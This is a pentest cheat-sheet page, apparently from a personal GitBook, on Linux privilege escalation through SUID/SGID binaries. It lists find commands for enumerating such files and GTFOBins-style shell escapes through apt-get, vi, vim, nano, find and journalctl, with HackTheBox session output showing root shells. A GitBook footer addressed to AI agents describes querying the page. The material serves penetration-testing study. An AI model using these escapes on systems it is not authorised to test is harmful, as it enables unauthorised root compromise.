> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/suid-sgid.md).

# SUID/SGID

## SUID/SGID

```
find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm -4000 -type f 2>/dev/null
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

## Enum SUID / SGID - Find

```
find /etc -perm 777
find / -user username

# Find files with SUID configured
find /usr/bin -perm 4755

# Find files with SGID configured
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
find /etc -perm /1444
```

{% embed url="<https://www.redhat.com/sysadmin/audit-permissions-find>" %}

## Setuid

The `setuid` bit appears as an `s`.

```shell-session
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

## Setgid

```
find / -uid 0 -perm -6000 -type f 2>/dev/null
```

```shell-session
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
```

## GTFOBins

{% embed url="<https://gtfobins.github.io/>" %}

### apt-get

```shell-session
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)
```

### Vi

```
sudo vi
:!sh
```

### More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

```
Dans vim
:set shell=/bin/sh
:shell
```

{% embed url="<https://gtfobins.github.io/gtfobins/vim/>" %}

### Nano

```
./nano
^R^X
reset; sh 1>&0 2>&0
```

{% embed url="<https://gtfobins.github.io/gtfobins/nano/#file-read>" %}

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-OpenAdmin/>" %}

### Find

```
find . -exec /bin/sh -p \; -quit`
```

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

### Journalctl

```
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
```

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-Traverxec/>" %}

{% embed url="<https://gtfobins.github.io/gtfobins/journalctl/>" %}

### Systemctl

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

## Tool

{% embed url="<https://github.com/Frissi0n/GTFONow>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/suid-sgid.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.